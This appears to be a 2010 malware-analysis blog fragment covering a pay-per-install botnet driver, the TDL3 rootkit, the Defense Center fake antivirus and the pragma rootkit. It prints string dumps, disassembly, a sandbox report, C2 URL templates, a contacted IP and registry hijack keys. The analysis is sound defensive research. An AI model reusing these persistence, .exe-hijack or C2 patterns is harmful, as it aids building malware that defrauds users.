0x00002564	0x00000005	WWWWh
0x0000C0EC	0x0000001A	\Driver\NTICE
0x0000C108	0x00000016	\Driver\npf
0x0000C120	0x00000016	\SystemRoot
0x0000C142	0x00000006	.cdata
0x0000C14A	0x0000000A	hwldi
0x0000C156	0x0000000A	hwsht
0x0000C170	0x00000010	TransportAddress
0x0000C182	0x00000011	ConnectionContext
0x0000C19E	0x00000006	      
0x0000C1A6	0x0000000A	hwbcr
0x0000C39C	0x00000009	opera.exe
0x0000C3A8	0x0000000A	thebat.exe
0x0000C3B4	0x0000000F	thunderbird.exe
0x0000C3C4	0x00000009	msimn.exe
0x0000C3D0	0x0000000A	telnet.exe
0x0000C708	0x0000002D	e:\eclipse\botnet\drivers\Bin\i386\kernel.pdb
0x000103AE	0x00000008	hfisa@Pj
0x00010920	0x00000019	%08x %ws+0x%x (%08x:%08x)
0x0001093A	0x0000001D	%08x unknown+0x%x (%08x:%08x)
0x00010958	0x00000012	 (0x%08X-->0x%08X)
0x00010978	0x0000000A	hwbcr
0x00010984	0x00000012	IofCompleteRequest
0x00010998	0x0000000D	IofCallDriver
0x00010A6E	0x0000001E	FILE: unknown+0x%x (%08x:%08x)
0x00010A94	0x0000000C	 (%08x:%08x)
0x00010AA2	0x00000005	+0x%x
0x00010AA8	0x00000009	FILE: %ws
0x00010ADA	0x00000025	BugCheck %X, {%08x, %08x, %08x, %08x}
0x00010B00	0x00000006	.cdata
0x00011610	0x0000000C	CreateModule
0x00011620	0x0000000C	DeleteModule
0x00012CF6	0x00000014	ObfDereferenceObject
0x00012D0E	0x00000017	ObReferenceObjectByName
0x00012D28	0x00000012	IoDriverObjectType
0x00012D3E	0x00000014	RtlInitUnicodeString
0x00012D57	0x00000014	xAllocatePoolWithTag
0x00012D6E	0x00000006	memset
0x00012D78	0x00000012	IofCompleteRequest
0x00012D8E	0x0000000C	PoCallDriver
0x00012D9E	0x00000013	PoStartNextPowerIrp
0x00012DB4	0x0000000E	IoDeleteDevice
0x00012DC6	0x0000001B	IoAttachDeviceToDeviceStack
0x00012DE4	0x0000000E	IoCreateDevice
0x00012DF6	0x00000012	ObfReferenceObject
0x00012E0C	0x00000018	IoGetRelatedDeviceObject
0x00012E28	0x00000019	ObReferenceObjectByHandle
0x00012E44	0x0000000C	IoCreateFile
0x00012E54	0x00000006	memcpy
0x00012E5E	0x0000000D	IofCallDriver
0x00012E6E	0x0000000E	IoAttachDevice
0x00012E80	0x00000009	_purecall
0x00012E8C	0x00000013	IoGetCurrentProcess
0x00012EA3	0x00000010	xFreePoolWithTag
0x00012EB6	0x00000008	_stricmp
0x00012EC2	0x00000012	KeGetCurrentThread
0x00012ED8	0x00000015	KeWaitForSingleObject
0x00012EF0	0x0000000D	IoAllocateIrp
0x00012F00	0x0000000C	KeClearEvent
0x00012F10	0x00000010	IoFileObjectType
0x00012F24	0x00000006	strcmp
0x00012F2E	0x00000007	strncat
0x00012F38	0x00000018	NtQuerySystemInformation
0x00012F54	0x00000007	ZwClose
0x00012F5E	0x00000018	KeServiceDescriptorTable
0x00012F7A	0x00000010	MmIsAddressValid
0x00012F8E	0x00000007	sprintf
0x00012F98	0x0000000C	KeBugCheckEx
0x00012FA8	0x0000000C	PsGetVersion
0x00012FB8	0x0000001D	IoBuildDeviceIoControlRequest
0x00012FD8	0x00000011	KeInitializeEvent
0x00012FEC	0x0000000A	KeSetEvent
0x00012FFA	0x00000014	RtlFreeUnicodeString
0x00013012	0x00000017	RtlCompareUnicodeString
0x0001302C	0x00000014	RtlCopyUnicodeString
0x00013044	0x00000019	MmGetSystemRoutineAddress
0x00013060	0x00000011	RtlFreeAnsiString
0x00013074	0x0000001C	RtlUnicodeStringToAnsiString
0x00013094	0x00000016	RtlQueryRegistryValues
0x000130AE	0x0000001E	IoRegisterShutdownNotification
0x000130D0	0x00000013	KeSetPriorityThread
0x000130E6	0x00000014	PsCreateSystemThread
0x000130FE	0x00000019	RtlUnicodeStringToInteger
0x0001311A	0x00000013	RtlTimeToTimeFields
0x00013130	0x00000007	_allmul
0x0001313A	0x00000015	RtlWriteRegistryValue
0x00013152	0x00000014	RtlCreateRegistryKey
0x0001316A	0x00000008	swprintf
0x00013176	0x00000016	RtlDeleteRegistryValue
0x00013190	0x00000011	ObQueryNameString
0x000131A4	0x00000009	IoFreeIrp
0x000131B0	0x0000000E	ObInsertObject
0x000131C2	0x0000001E	SeSetAccessStateGenericMapping
0x000131E4	0x00000011	RtlMapGenericMask
0x000131F8	0x00000013	SeCreateAccessState
0x0001320E	0x0000000E	ObCreateObject
0x00013220	0x00000009	IoFreeMdl
0x0001322C	0x0000000D	MmUnlockPages
0x0001323C	0x0000000B	IoCancelIrp
0x0001324A	0x00000013	MmProbeAndLockPages
0x00013260	0x0000000D	IoAllocateMdl
0x00013270	0x00000018	KeWaitForMultipleObjects
0x0001328C	0x0000000C	KeResetEvent
0x0001329C	0x00000012	KeNumberProcessors
0x000132B2	0x00000008	_aulldiv
0x000132BE	0x0000001C	RtlAnsiStringToUnicodeString
0x000132DE	0x00000011	RtlInitAnsiString
0x000132F2	0x0000000B	KeTickCount
0x000132FE	0x0000000C	ntoskrnl.exe
0x0001330F	0x0000000F	eGetCurrentIrql
0x00013323	0x0000000A	fRaiseIrql
0x00013331	0x0000000A	fLowerIrql
0x0001333F	0x00000010	fReleaseSpinLock
0x00013353	0x00000010	fAcquireSpinLock
0x00013364	0x00000007	HAL.dll
0x0001336E	0x00000007	strncpy
0x00013378	0x00000007	wcsncpy
0x00013382	0x00000006	strlen
0x0001338C	0x00000010	RtlCompareMemory
0x000133A0	0x0000000A	ZwReadFile
0x000133AE	0x0000000B	ZwWriteFile
0x000133BC	0x00000011	KeQuerySystemTime
0x000133D0	0x00000006	strchr
0x000133DA	0x00000006	wcschr
0x000133E4	0x00000009	RtlUnwind
0x00013C39	0x00000009	;$;);2;9;

There you can see the “botnet” string, nothing good about that file. That also looks to see if kernel mode debugger is running.

To be continued…

Pay-Per-Install Analysis – Part Three

Thu, 15 Jul 2010 14:43:06 +0000

InstallConverter

This is where things get interesting. This company distributes one executable, TDL3. TDL3 is a very advanced piece of stealth malware, with rootkit capabilities. Here you can see Symantec are well aware of this.

Backdoor.Tidserv

This is how much they per for 1000 installs per country.

USA -	$170
Canada - $120
United Kingdom - $110
Australia, Austria, Belgium, Denmark, Finland, France, Germany, Greece, Iceland, Ireland, Italy, Netherlands, Norway, Spain, Sweden, Switzerland - $50

This is a list of strings from the unpacked executable. Notice the similarities to the Symantec writeup.

0×00013158 0×00000016 %1d.%1d %04d SP%1d.%1d
0×00013170 0×00000040 ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
0x000131BC 0×00000014 %s|%s|%s|%x|%x|%s|%s
0x000131DC 0×00000012 %[^;];%[^;];%[^;];
0x000131F8 0x0000000A \tdrv
0×00013204 0x0000000A \tdev
0×00013220 0×00000012 %[^;];%[^;];%[^;];
0x0001323C 0×00000024 system\currentcontrolset\services\%s
0×00013264 0×00000009 imagepath
0×00013278 0×00000028 \registry\machine\%S
0x000132A4 0x0000001C \\?\globalroot%wZ\tdlcmd.dll
0x000132C4 0×00000014 \\?\globalroot%wZ\%s
0x000132DC 0×00000009 bckfg.tmp
0x000132E8 0×00000014 \\?\globalroot%wZ\%s
0×00013304 0x0000000E %[^|]|%[^|]|%s
0×00013314 0×00000007 servers
0x0001331C 0×00000006 tdlcmd
0×00013324 0x0000000A wspservers
0×00013330 0×00000006 tdlcmd
0×00013338 0x0000000C popupservers
0×00013348 0×00000006 tdlcmd
0×00013350 0×00000011 %d.%d.%d %d:%d:%d
0×00013364 0×00000009 builddate
0×00013370 0×00000018 services.exe
0x0001338C 0x0000000E IsWow64Process
0x0001339C 0×00000008 kernel32
0x000133A8 0×00000020 \\?\globalroot%s
0x000133DC 0×00000007 spooler

TDL3 infects a random driver, so after infection I ran TDSSKiller.

There you can see its infected one of my VirtualBox drivers. TDSSKiller was able to remove it after a reboot.

To be continued…

The Case Of TDL3
Tidy TDSS (TLD3) Paper

FakeAV Analysis: Defense Center

Wed, 07 Jul 2010 11:37:54 +0000

Defense Center is doing the rounds again, but this time seems to be a bit more aggresive!

Lets start off with some screen shots.

Like all rogue AV’s it bombards you with warnings about how your computer is “infected”.

30% off! You’d be a fool not to snap that offer up, wouldn’t you?

Once installed, Defence Center installs a handler in HKCR\.exe\shell\open\command so it can intercept any .exe that is executed, if not removed properly you won’t be able to run any .exe file.

This is a list of strings from the unpacked dropper.

0x00002110	0x0000000E	UNKNOWN
0x00002120	0x00000014	%s%s%d.tmp
0x00002140	0x00000014	Azerbaijan
0x00002158	0x0000000E	Belarus
0x00002168	0x00000014	Kazakhstan
0x00002180	0x00000014	Kyrgyzstan
0x00002198	0x0000000C	Russia
0x000021A8	0x00000014	Uzbekistan
0x000021C0	0x0000000E	Ukraine
0x000021D0	0x0000001C	Czech Republic
0x000021F0	0x0000000C	Poland
0x00002210	0x00000018	_favdata.dat
0x00002230	0x00000014	Printers\Connections
0x00002248	0x00000005	affid
0x00002250	0x00000005	subid
0x00002258	0x0000004A	\AAB647AB-4C1A-4cf0-9DE5-DD056FABF1F9
0x000022A4	0x0000000C	%[^;];%[^;];
0x000022BC	0x0000000E	IsWow64Process
0x000022CC	0x00000008	kernel32
0x000022D8	0x00000015	ObtainUserAgentString
0x000022F0	0x0000000A	urlmon.dll
0x000022FC	0x00000037	Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
 
336;landing;-1;.hxxp://Traffic-Photos.com/ms05/ad;hxxp://www.easysecurityscan.com/ms05/ad;hxxp://www.fastanyprime.com/ms05/ad;...hxxp://Traffic-Photos.com/ms05/ad;hxxp://www.easysecurityscan.com/ms05/ad;hxxp://www.fastanyprime.com/ms05/ad

Here we can see the results of these URL’s on URLVoid.

Traffic-Photos.com
easysecurityscan.com
fastanyprime.com

The small list of country strings are countries the writer of this malware doesn’t want it to execute on.

0040113A   |>  56                 /PUSH ESI                                          ; /wstr2 = "United States"
0040113B   |. |FF74BD DC          |PUSH DWORD PTR SS:[EBP+EDI*4-24]                  ; |wstr1 = "Azerbaijan"
0040113F   |. |E8 5E0A0000        |CALL                         ; \_wcsicmp
00401144   |. |85C0               |TEST EAX,EAX
00401146   |. |59                 |POP ECX
00401147   |. |59                 |POP ECX
00401148   |. |74 0C              |JE SHORT dump_.00401156 ; eventually goes to ExitProcess.
0040114A   |. |47                 |INC EDI
0040114B   |. |83FF 09            |CMP EDI,9
0040114E   |.^\72 EA              \JB SHORT dump_.0040113A

This is a list of strings from the dropped file that now handles all executions of .exe’s.

0x00005044	0x00000011	 jour importantes
0x000051F5	0x00000005	 jour
0x0000539C	0x00000014	Updates installieren
0x000053B4	0x00000050	Riavviare il computer per completare l'installazione di importanti aggiornamenti
0x0000556C	0x00000016	Installa aggiornamenti
0x000055AB	0x0000002A	re installasjonen av viktige oppdateringer
0x000056F4	0x00000017	Installer oppdateringer
0x0000570C	0x00000046	Reinicie su equipo para acabar de instalar actualizaciones importantes
0x000058C4	0x00000018	Instalar actualizaciones
0x000058E0	0x0000003C	Restart your computer to finish installing important updates
0x00005920	0x00000018	AUTMGR32.EXE
0x000059FC	0x00000009	1. Click 
0x00005A08	0x00000011	"Install Updates"
0x00005A1C	0x00000009	2. Click 
0x00005A28	0x00000018	 when UAC screen appears
0x00005A44	0x00000007	"Allow"
0x00005A4C	0x0000000E	System Failure
0x00005BC0	0x00000012	Pvebbmg)Tlkpkw*gki
0x00005C40	0x00000012	Pvebbmg)Tlkpkw*gki
0x00005CC0	0x00000012	Pvebbmg)Tlkpkw*gki
0x00005D44	0x00000005	ffid_
0x00005D63	0x00000008	heck_vm_
0x00005D83	0x00000006	setid_
0x00005DA0	0x0000000A	runas
0x00005DAC	0x00000022	WindowsUpdate.exe
0x00005DD0	0x0000000C	\license.dat
0x00005DE0	0x00000017	Software\Defense Center
0x00005DF8	0x00000007	License
0x00005E00	0x0000002C	94804860143697233939975370329435970097710202
0x00005E30	0x0000000C	LoadLibraryA
0x00005E40	0x0000000C	kernel32.dll
0x00005E50	0x00000030	AcceptedPrivacyStatement
0x00005E84	0x0000005E	Software\Classes\Software\Microsoft\Preferences
0x00005EE4	0x00000046	Software\Classes\Software\Microsoft
0x00005F2C	0x00000032	Software\Classes\Software
0x00005F60	0x00000058	Software\Classes\secfile\shell\start\command
0x00005FBC	0x00000048	Software\Classes\secfile\shell\start
0x00006008	0x00000058	Software\Classes\secfile\shell\runas\command
0x00006064	0x00000048	Software\Classes\secfile\shell\runas
0x000060B0	0x00000056	Software\Classes\secfile\shell\open\command
0x00006108	0x00000046	Software\Classes\secfile\shell\open
0x00006150	0x0000003C	Software\Classes\secfile\shell
0x00006190	0x00000048	Software\Classes\secfile\DefaultIcon
0x000061DC	0x00000030	Software\Classes\secfile
0x00006210	0x00000016	Application
0x00006228	0x00000052	Software\Classes\.exe\shell\start\command
0x0000627C	0x00000042	Software\Classes\.exe\shell\start
0x000062C0	0x00000052	Software\Classes\.exe\shell\runas\command
0x00006314	0x00000042	Software\Classes\.exe\shell\runas
0x00006358	0x0000001E	IsolatedCommand
0x00006378	0x0000000E	"%1" %*
0x00006388	0x0000002A	"%s" /START "%%1" %%*
0x000063B4	0x00000050	Software\Classes\.exe\shell\open\command
0x00006408	0x00000040	Software\Classes\.exe\shell\open
0x0000644C	0x00000036	Software\Classes\.exe\shell
0x0000648C	0x00000042	Software\Classes\.exe\DefaultIcon
0x000064D0	0x00000018	Content Type
0x000064EC	0x00000030	application/x-msdownload
0x00006520	0x0000000E	secfile
0x00006530	0x0000002A	Software\Classes\.exe
0x0000655C	0x00000020	Software\Classes
0x0000658C	0x00000039	Software\Microsoft\Windows\CurrentVersion\Policies\System
0x000065C8	0x0000000E	DisableTaskMgr
0x000065D8	0x00000014	topwesitjh
0x000065F0	0x00000048	d8bb5910-2d85-489b-8403-803ed25e73bc
0x0000663C	0x00000048	9cf2592c-1832-4358-a0fc-26d6a0c29808
0x00006688	0x00000005	%09lu
0x00006690	0x00000008	wget 3.0
0x0000669C	0x00000048	f7c5da73-b4a5-4947-8f40-08f2871eb36b
0x000066E8	0x00000010	Software
0x00006700	0x0000001B	http://%s/any2/%s-direct.ex
0x00006734	0x0000000D	\_favdata.dat
0x00006744	0x00000006	French
0x0000674C	0x00000007	Italian
0x00006754	0x00000006	German
0x0000675C	0x00000007	Spanish
0x00006764	0x00000009	Norwegian
0x00006770	0x00000006	Polish
0x00006778	0x00000005	Czech
0x00006780	0x00000009	Ukrainian
0x0000678C	0x00000007	Russian
0x00006794	0x00000006	_Run@0
0x0000679C	0x0000000C	Explorer.exe
0x000067AC	0x0000000E	mschrt20ex.dll
0x000067C4	0x0000000E	/START 
0x000067D4	0x0000000C	/START
0x0000B350	0x00000005	.text
0x0000B377	0x00000007	`.rdata
0x0000B39F	0x00000006	@.data
0x0000B3C8	0x00000005	.rsrc
0x0000B3EF	0x00000007	@.fasoc
0x0000CF7D	0x00000005	(>T$C
0x0000D12E	0x00000014	ouporn.com
0x0000D144	0x00000018	nudetube.com
0x0000D160	0x0000001A	pornotube.com
0x0000D17C	0x0000000A	3.ico
0x0000D188	0x0000000A	2.ico
0x0000D194	0x0000000A	1.ico
0x0000D1A0	0x000000A0	A security threat detected on your computer! This malicious program may steal your private data. Click on the message to ensure 
0x0000D248	0x0000009A	Harmful viruses detected on your computer. This malicious software may harm your computer. Click on the message to ensure the pr
0x0000D2E8	0x000000C0	You are running a trial antivirus software version. Activate your antivirus software copy to get full-time antivirus protection.
0x0000D3B0	0x0000008D	It is strongly recommended to protect your computer against security threats. Click on the message to ensure the protection of y
0x0000D440	0x000000B5	It is strongly recommended to remove all detected viruses to protect your computer against existing security threats. Click on t
0x0000D4F8	0x00000007	Danger!
0x0000D500	0x0000009D	A security threat detected on your computer. TrojanASPX.JS.Win32. It strongly recommended to remove this threat right now. Click
0x0000D5A0	0x0000007A	Unauthorized person tries to steal your passwords and private information. Click on the message to prevent identity theft.
0x0000D620	0x00000066	Unauthosrized access to your computer! Click on the message to install up-to-date antivirus software. 
0x0000D688	0x00000074	Harmful viruses detected on your computer. Click on the message to scan your computer for security threats for free.
0x0000D700	0x00000005	%09lu
0x0000D708	0x00000034	\Defense Center\defcnt.exe
0x0000D748	0x00000018	wscsvc32.exe
0x0000D768	0x00000048	d8bb5910-2d85-489b-8403-803ed25e73bc
0x0000D7B4	0x0000002C	94804860143697233939975370329435970097710202
0x0000D7E4	0x00000007	License
0x0000D7EC	0x00000017	Software\Defense Center
0x0000D804	0x0000000C	\license.dat
0x0000D814	0x0000001A	\Defense Center\defcnt.exe
0x0000D830	0x00000016	Windows Security Alert
0x0000D848	0x0000000C	 /inst
0x0000D860	0x0000001E	eiojrthgoeijujwqodiehurisejawu
0x0000D880	0x00000018	\spam001.exe
0x0000D89C	0x00000018	\spam003.exe
0x0000D8B8	0x00000018	\troj000.exe
0x0000D8D4	0x0000000D	Shell_TrayWnd
0x0000D8E4	0x00000006	Button
0x0000D8F0	0x00000098	System files of your computer are damaged. Please, restart your system ASAP.
0x0000D994	0x00000014	Printers\Connections
0x0000D9B0	0x0000000D	\_favdata.dat
0x0000D9C8	0x0000004E	http://%s/readdatagateway.php?type=stats&affid=%s&subid=%s&version=%s&adwareok
0x0000DA18	0x0000000E	DisableTaskMgr
0x0000DA28	0x00000039	Software\Microsoft\Windows\CurrentVersion\Policies\System
0x0000DA64	0x0000000C	explorer.exe
0x0000DA74	0x00000008	Software
0x0000DA80	0x00000024	dd1c3e54-4b10-4a73-91eb-fa561c094261
0x0000DAA8	0x00000024	24d1ca9a-a864-4f7b-86fe-495eb56529d8
0x0000DAD0	0x00000008	wget 3.0
0x0000DAE0	0x0000003E	\Internet Explorer\iexplore.exe
0x0000DB30	0x00000026	SeShutdownPrivilege
0x0000DB58	0x00000014	fiuejsiogj
0x0000DD88	0x00000009	ntdll.dll
0x0000DD94	0x00000008	StrStrIA
0x0000DDA0	0x00000007	StrCatW
0x0000DDAA	0x0000000A	wnsprintfA
0x0000DDB8	0x00000007	StrCpyW
0x0000DDC0	0x0000000B	SHLWAPI.dll
0x0000DDCE	0x00000010	InternetOpenUrlA
0x0000DDE2	0x00000010	InternetReadFile
0x0000DDF6	0x0000000D	InternetOpenA
0x0000DE07	0x00000012	nternetCloseHandle
0x0000DE1A	0x0000000B	WININET.dll
0x0000DE28	0x00000017	SHGetSpecialFolderPathA
0x0000DE42	0x00000017	SHGetSpecialFolderPathW
0x0000DE5C	0x00000011	Shell_NotifyIconA
0x0000DE6E	0x0000000B	SHELL32.dll
0x0000DE7C	0x00000010	GetComputerNameA
0x0000DE91	0x0000000B	reateMutexW
0x0000DEA0	0x00000008	lstrlenA
0x0000DEAC	0x00000009	lstrcpynA
0x0000DEB8	0x00000013	WaitForSingleObject
0x0000DECE	0x0000000C	GetTickCount
0x0000DEDE	0x0000000B	VirtualFree
0x0000DEEC	0x00000019	InitializeCriticalSection
0x0000DF08	0x00000015	GetVolumeInformationA
0x0000DF20	0x00000005	Sleep
0x0000DF28	0x00000008	lstrcatA
0x0000DF34	0x00000008	lstrlenW
0x0000DF40	0x0000000C	GetTempPathW
0x0000DF50	0x00000019	DisableThreadLibraryCalls
0x0000DF6C	0x00000012	GetModuleFileNameA
0x0000DF82	0x00000008	lstrcatW
0x0000DF8E	0x00000015	DeleteCriticalSection
0x0000DFA7	0x0000000B	reateThread
0x0000DFB6	0x00000008	lstrcpyA
0x0000DFC2	0x00000010	GetTempFileNameW
0x0000DFD7	0x0000000A	reateFileA
0x0000DFE4	0x0000000B	GetFileSize
0x0000DFF2	0x0000000E	SetFilePointer
0x0000E004	0x0000000D	FindResourceW
0x0000E014	0x0000000C	LoadResource
0x0000E025	0x0000000D	reateProcessW
0x0000E036	0x00000011	GetCurrentProcess
0x0000E04A	0x00000009	WriteFile
0x0000E056	0x0000000E	SizeofResource
0x0000E068	0x00000012	GetFileAttributesA
0x0000E07E	0x00000008	ReadFile
0x0000E08B	0x0000000A	reateFileW
0x0000E098	0x0000000C	GetLastError
0x0000E0A8	0x0000000C	VirtualAlloc
0x0000E0B8	0x0000000C	LockResource
0x0000E0C9	0x0000000A	loseHandle
0x0000E0D4	0x0000000C	KERNEL32.dll
0x0000E0E4	0x00000010	DispatchMessageW
0x0000E0F8	0x0000000B	FindWindowA
0x0000E106	0x0000000C	SendMessageW
0x0000E116	0x0000000C	PostMessageA
0x0000E126	0x00000008	IsWindow
0x0000E132	0x0000000A	ShowWindow
0x0000E140	0x00000009	EndDialog
0x0000E14C	0x0000000E	GetWindowTextW
0x0000E15E	0x00000009	LoadIconW
0x0000E16A	0x00000010	IsDialogMessageW
0x0000E17E	0x00000010	TranslateMessage
0x0000E192	0x0000000B	EnumWindows
0x0000E1A0	0x00000009	wsprintfA
0x0000E1AC	0x00000009	KillTimer
0x0000E1B8	0x0000000C	PostMessageW
0x0000E1C8	0x0000000B	GetMessageW
0x0000E1D7	0x00000011	reateDialogParamA
0x0000E1EC	0x00000008	SetTimer
0x0000E1F6	0x0000000A	USER32.dll
0x0000E204	0x00000010	OpenProcessToken
0x0000E218	0x0000000E	RegSetValueExA
0x0000E22A	0x00000010	RegQueryValueExA
0x0000E23E	0x0000000D	RegCreateKeyA
0x0000E24E	0x00000015	LookupPrivilegeValueW
0x0000E266	0x0000000B	RegOpenKeyA
0x0000E274	0x00000015	AdjustTokenPrivileges
0x0000E28C	0x00000017	InitiateSystemShutdownW
0x0000E2A6	0x0000000B	RegCloseKey
0x0000E2B2	0x0000000C	ADVAPI32.dll
0x0000E2C3	0x0000000B	oInitialize
0x0000E2D2	0x00000010	CoCreateInstance
0x0000E2E4	0x00000009	ole32.dll
0x0000E2F0	0x00000006	memset
0x0000E2FA	0x00000007	_chkstk
0x0000E342	0x0000000A	Adware.dll
0x0000E34D	0x00000006	_Run@0
0x0000E36C	0x00000036	f:\src\mrs_adware\Adware2\trunk\Dll\release\Adware.pdb
0x00020097	0x00000007	)w2%n%~
0x000234F3	0x00000005	q\MP&
0x000264C7	0x00000005	rX${p
0x00027B44	0x00000005	03uJS
0x0002E1F5	0x00000007	zdC?irU
0x000369EA	0x00000006	g@*jRV
0x000520A2	0x00000009	qE{tDs/id
0x00054406	0x00000005	\6+9'
0x0005AB1F	0x00000005	SI~/W
0x0005AD20	0x0000000C	kernel32.dll
0x0005AD2F	0x00000010	GetModuleHandleW
0x0005AD42	0x00000010	GetCurrentThread
0x0005AD55	0x0000000F	TerminateThread
0x0005AD75	0x0000000C	advapi32.dll
0x0005AD84	0x00000011	AdjustTokenGroups
0x0005AD98	0x0000000D	CloseEventLog
0x0005ADA8	0x00000011	CryptSetHashParam
0x0005ADBC	0x00000009	DeleteAce
0x0005ADC8	0x0000000E	DuplicateToken
0x0005ADD9	0x00000011	CryptGetHashParam
0x0005AE07	0x0000000A	msvcrt.dll
0x0005AE1B	0x00000010	_except_handler2
0x0005AE2E	0x00000007	_CIacos
0x0005AE38	0x00000006	_cexit
0x0006B78A	0x0000001C	Windows Update
0x0006B7AA	0x00000018	MS Shell Dlg
0x0006B7DA	0x0000001E	Install Updates
0x0006B812	0x0000000C	Static
0x0006B83A	0x00000012	1. Click 
0x0006B866	0x00000022	"Install Updates"
0x0006B8A2	0x00000010	2. Click
0x0006B8CE	0x0000000E	"Allow"
0x0006B8F6	0x0000002E	when UAC screen appears

Notice the compile path for the DLL?

f:\src\mrs_adware\Adware2\trunk\Dll\release\Adware.pdb

This malware also creates some p0rn shortcuts on the desktop, and three other files, spam001.exe, spam003.exe and troj000.exe, but these files aren’t actually executables.

This is what the payment screen looks like in their so-called “Safebrowser”. Obviously filling out that information could put you in some serious danger, either by them emptying your bank account, and/or using the personal information for identity theft.

This is a sandbox report of the original dropper.

Detailed report of suspicious malware actions:
 
Created file on defined folder: C:\Documents and Settings\Administrator\Local Settings\Temp\TMP57114.tmp
Created file on defined folder: C:\Documents and Settings\Administrator\Local Settings\Temp\topwesitjh
Created file on defined folder: C:\Documents and Settings\All Users\Favorites\_favdata.dat
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\AUTMGR32.EXE
Defined registry AutoStart location added or modified: user\current_classes\.exe\shell\open\command  = "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AUTMGR32.EXE" /START "%1" %*
Defined registry AutoStart location added or modified: user\current_classes\.exe\shell\open\command\IsolatedCommand = "%1" %*
Internet connection: C:\Documents and Settings\Administrator\Desktop\dropper.exe Connects to "91.213.157.69" on port 80 (TCP - HTTP).
Query DNS: traffic-photos .com
 
Risk evaluation result: High

This also downloaded the pragma rootkit, the old(and probably sold) version of TDSS.

pragmacfg.ini:

[common]
botid=414796669-1177238915-152049171-1708537768
affid=336
subid=direct
build=no
[injections]
explorer.exe=pragmaserf
iexplore.exe=pragmaserf;pragmabbr
firefox.exe=pragmabbr
safari.exe=pragmabbr
chrome.exe=pragmabbr
opera.exe=pragmabbr

pragmabbr.dll strings:

0x000001E0	0x00000005	.text
0x00000207	0x00000007	`.rdata
0x0000022F	0x00000006	@.data
0x00000258	0x00000006	.reloc
0x0000027F	0x00000009	B.datatxt
0x000002A7	0x00000007	@.rdata
0x000002CF	0x00000007	@.ldata
0x000002F7	0x00000007	@.rdsec
0x00000320	0x00000005	.rsrc
0x00000347	0x00000007	@.sdata
0x0000036F	0x00000007	@.mdata
0x00000397	0x00000007	@.kdata
0x000003BF	0x00000007	@.edata
0x00001076	0x00000005	D$ Pj
0x000010D5	0x00000005	T$ Rj
0x00001134	0x00000005	L$ Qj
0x00001193	0x00000005	D$ Pj
0x000011F8	0x00000005	tZhHb
0x00001894	0x00000007	UWSPhXc
0x00001AB8	0x00000005	tDj@h
0x00001F36	0x00000005	u|h0d
0x00001F42	0x00000005	uphHd
0x00001F4E	0x00000005	udhXd
0x00001F5A	0x00000005	uXhpd
0x0000257A	0x00000005	D$8Te
0x00002582	0x00000005	D$<de
0x00002662	0x00000005	tFhde
0x00002670	0x00000005	t8hde
0x00002EDC	0x00000005	T$(Rj
0x000032D0	0x00000005	tuh@g
0x000033CB	0x00000007	L$ Qhhk
0x00003412	0x00000007	L$ Qhhk
0x000036F7	0x00000007	D$ Phhk
0x0000393C	0x00000006	Ut7j@h
0x000039D5	0x00000005	t7j@h
0x00003A5D	0x00000005	l( Uj
0x00003BCA	0x00000005	t7j@h
0x000044FE	0x00000007	UUUUh4k
0x00004621	0x00000005	v]j@h
0x00004EF3	0x00000006	u;WhDk
0x00004F95	0x00000005	PQhXk
0x00006178	0x0000000F	searchequal.com
0x00006188	0x0000000D	findsomup.org
0x00006198	0x0000000D	raincfind.org
0x000061A8	0x0000002C	94804860143697233939975370329435970097710202
0x000061D8	0x0000002C	85108357713673677262162845570576027004153211
0x00006208	0x00000007	License
0x00006210	0x0000001A	Software\Paladin Antivirus
0x0000622C	0x00000018	Software\Malware Defense
0x00006248	0x0000000C	\license.dat
0x00006258	0x0000000D	pragmacfg.ini
0x0000626C	0x00000005	affid
0x00006274	0x00000006	common
0x0000627C	0x00000007	default
0x00006284	0x00000005	subid
0x0000628C	0x00000012	[PANEL_SIGN_CHECK]
0x000062A0	0x0000000C	[panels_end]
0x000062B0	0x0000000E	[panels_begin]
0x000062C8	0x0000000D	[referer_end]
0x000062D8	0x0000000F	[referer_begin]
0x000062E8	0x00000013	[request_param_end]
0x000062FC	0x00000015	[request_param_begin]
0x00006314	0x0000000A	[prov_end]
0x00006320	0x0000000C	[prov_begin]
0x00006330	0x00000011	[domens_fake_end]
0x00006344	0x00000013	[domens_fake_begin]
0x00006358	0x0000003E	http://%s/?gd=%s&affid=%s&subid=%s&dprov=&mode=cr&v=6&newref=1
0x00006398	0x0000000A	OK_INSTALL
0x000063A4	0x0000000A	GET_PARAMS
0x000063C8	0x00000053	http://%s/?affid=%s&subid=%s&prov=%s&keyword=%s&ref=%s&direct=1&shurl=1&lastpage=%s
0x0000641C	0x00000010	clients1.google.
0x00006430	0x00000016	toolbarqueries.google.
0x00006448	0x0000000F	maps.google.com
0x00006458	0x00000016	suggestqueries.google.
0x00006470	0x00000006	/aclk?
0x00006478	0x00000007	google.
0x00006480	0x00000035	http://www.google.com/tools/toolbar/service/noupdate?
0x000064B8	0x0000000F	X-Moz: prefetch
0x000064C8	0x0000001A	click-analytics.google.com
0x000064E4	0x0000000C	search/cache
0x000064F4	0x0000000E	/search/search
0x00006504	0x0000000C	search/redir
0x00006514	0x00000009	alexa.com
0x00006520	0x00000009	facebook.
0x0000652C	0x00000011	Accept-Language: 
0x00006544	0x0000000C	User-Agent: 
0x00006554	0x0000000C	/gp/product/
0x0000656C	0x0000000A	amazon.com
0x00006580	0x0000000B	endless.com
0x00006590	0x00000071	http://www.amazon.com/gp/product/%s?ie=UTF8&tag=peakclick-20&linkCode=as2&camp=1789&creative=9325&creativeASIN=%s
0x00006608	0x00000063	http://www.endless.com/dp/%s?_encoding=UTF8&tag=peakclick-20&linkCode=xm2&camp=1789&creativeASIN=%s
0x00006674	0x00000005	POST 
0x0000667C	0x00000034	click-analytics.google.com
0x000066BC	0x00000007	wsock32
0x000066C4	0x00000006	ws2_32
0x000066CC	0x00000007	WSASend
0x000066D4	0x00000007	WSARecv
0x000066DC	0x00000007	connect
0x000066E4	0x0000000B	closesocket
0x000066F8	0x0000000A	DnsQuery_A
0x00006704	0x00000006	Dnsapi
0x0000670C	0x0000000A	DnsQuery_W
0x00006748	0x00000006	200 OK
0x00006768	0x00000010	pragmamainqt.dll
0x0000677C	0x00000020	pragmapdconf.ini
0x000067A0	0x0000000D	TabProcGrowth
0x000067B0	0x00000029	Software\Microsoft\Internet Explorer\Main
